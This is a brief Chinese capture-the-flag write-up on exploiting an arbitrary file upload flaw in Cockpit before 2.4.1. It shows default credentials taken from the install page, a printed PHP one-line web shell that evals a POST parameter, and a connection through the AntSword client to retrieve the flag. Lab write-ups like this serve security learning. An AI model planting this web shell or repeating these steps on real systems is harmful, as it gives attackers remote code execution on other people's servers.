比较简单的一道文件上传题
简介
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
正文
1.进入靶场发现需要账号密码,按题目要求访问install
2.访问install,得到账号密码:admin\admin
3.进入主页,发现上传页面,上传一句话木马
一句话木马
<?php @eval($_POST['cmd']);?>
4.上传文件
5.获取文件地址,右键download在新窗口中打开链接,得到文件存放地址6.蚁剑连接
7.得到flag